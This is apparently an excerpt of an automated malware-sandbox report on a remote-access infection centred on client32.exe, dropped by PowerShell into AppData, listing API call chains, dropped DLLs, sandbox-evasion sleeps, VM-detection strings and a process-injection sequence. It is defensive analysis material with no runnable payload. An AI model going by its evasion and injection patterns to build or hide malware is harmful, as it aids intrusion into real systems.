Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 37_2_110CB2B0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 37_2_110254A0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId, 37_2_110258F0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 37_2_11023BA0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 37_2_11024280
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11112670 IsIconic,GetTickCount, 37_2_11112670
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 37_2_111229D0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 37_2_110C0BB0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 37_2_1115ADD0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 37_2_11143570
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC94F30 37_2_6CC94F30
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC891F0 37_2_6CC891F0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110B8200 Sleep,ExitProcess, 37_2_110B8200
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary, 37_2_6CC97F80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\osk.exe Window / User API: threadDelayed 523 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8623 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1254 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1453 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6933 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Roaming\Options\client32.exe API coverage: 5.7 %
Source: C:\Windows\System32\osk.exe TID: 2980 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep count: 8623 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep count: 1254 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 Thread sleep count: 1453 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 Thread sleep count: 6933 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CC93226h 37_2_6CC93130
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 37_2_1102D330
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 37_2_11065890
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 37_2_1106A0A0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 37_2_111266E0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 37_2_1110AFD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7E3438 GetSystemInfo, 34_2_00007FFC8B7E3438
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: VMware
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A75D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: explorer.exe, 00000016.00000002.2440811565.0000000008894000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTORVMWare
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor>
Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000016.00000000.1602380186.0000000006EDD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V rytllcpqlndyltx Bus Pipes
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processorft
Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000E
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34
Source: explorer.exe, 00000016.00000003.2247809094.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&00000
Source: explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD0021-224I
Source: explorer.exe, 00000016.00000002.2440811565.00000000087F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1609515483.00000000089C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor{-
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorDTs
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34VMware20,1
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipest
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorsys
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root PartitionPt
Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}UE
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll./
Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000002.2412632825.0000000000A76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processord-
Source: explorer.exe, 00000016.00000003.2250792493.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: chrome.exe, 00000000.00000002.2487145456.000028EC03B10000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
